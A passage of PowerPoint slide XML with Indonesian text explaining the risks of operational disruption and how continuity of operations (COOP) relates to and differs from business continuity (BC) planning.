              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang lama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakpatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bisnis</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontinuitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (COOP) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontinuitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (BC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>krisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontinuitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. COOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melanjutkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
